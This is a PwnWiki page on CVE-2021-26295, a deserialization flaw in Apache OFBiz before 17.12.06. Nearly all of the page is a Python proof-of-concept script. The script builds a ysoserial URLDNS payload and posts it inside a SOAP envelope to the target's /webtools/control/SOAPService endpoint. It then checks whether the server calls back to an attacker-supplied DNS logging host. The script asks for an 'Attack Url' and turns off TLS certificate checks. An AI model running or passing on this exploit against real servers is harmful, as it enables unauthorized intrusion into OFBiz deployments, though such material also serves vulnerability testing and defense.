CVE-2021-26295 Apache OFBiz RMI反序列化漏洞

From PwnWiki
Revision as of 10:31, 24 March 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> Apache OFBiz < 17.12.06 ==POC== <pre> import requests import sys import sys import subprocess import binascii from r...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎español • ‎français • ‎русский • ‎中文(繁體)‎

漏洞影響

Apache OFBiz < 17.12.06


POC

import requests
import sys
import sys
import subprocess
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: Apache OFBiz                                            \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+  \033[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+------------------------------------------')

def trans(s):
    return "%s" % ''.join('%.2x' % x for x in s)

def POC_1(target_url, Dnslog):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE)
    data = popen.stdout.read()
    hex_data = trans(data)
    headers = {
        'Content-Type': 'text/xml'
    }
    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data
    vuln_url = target_url + "/webtools/control/SOAPService"
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在请求 {}/webtools/control/SOAPService..... \033[0m".format(target_url))
        if response.status_code == 200:
            print("\033[36m[o] 请检查 Dnslog 响应\n \033[0m")
        else:
            print("\033[31m[x] 请求失败 \033[0m")
            sys.exit(0)

    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m")


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    Dnslog = str(input("\033[35mDnslog >>> \033[0m"))
    POC_1(target_url, Dnslog)
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI反序列化漏洞&oldid=642"